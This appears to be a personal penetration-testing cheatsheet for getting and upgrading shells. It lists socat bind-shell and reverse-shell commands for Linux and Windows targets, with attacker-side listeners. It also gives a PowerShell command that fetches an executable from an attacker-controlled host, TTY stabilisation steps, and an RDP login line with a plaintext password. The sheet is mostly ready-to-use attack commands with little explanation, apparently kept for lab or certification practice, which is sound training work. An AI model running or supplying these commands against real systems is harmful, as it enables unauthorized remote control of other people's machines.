# Quality of Life Cheatsheet

# Creating a smart shell What a waste of 2 hours figuring this out

SOCAT
Commands:
Bind Shell
Victim Linux: socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
Victim Windows: socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Attacker: socat - TCP4:192.168.1.1:4443

Reverse Shell
Victim Linux: socat TCP4:192.168.168.1:4443 EXEC:/bin/bash
Victim Windows: socat TCP4:192.168.1.1:4443 EXEC:'cmd.exe',pipes
Attacker: socat -d -d TCP4-LISTEN:4443 STDOUT


Python
# This doesn't work for me but I'll keep it here for reference
exec bash --login

# In reverse shell

IF PYTHON NOT AVAILABLE =============================================
powershell
iwr -uri http://192.168.45.230/winx32python.exe -Outfile python.exe
cmd
python.exe -c "import pty; pty.spawn('/bin/bash')"

else ========================================================
python -c "import pty; pty.spawn('/bin/bash')"

Ctrl-Z

stty raw -echo
fg
 reset
 export SHELL=bash
 export TERM=xterm-256color
 stty rows 38 columns 116



freerdp /u:admin /p:'mypassword' /v:'192.168.208.220' /cert-ignore /w:1366 /h:768
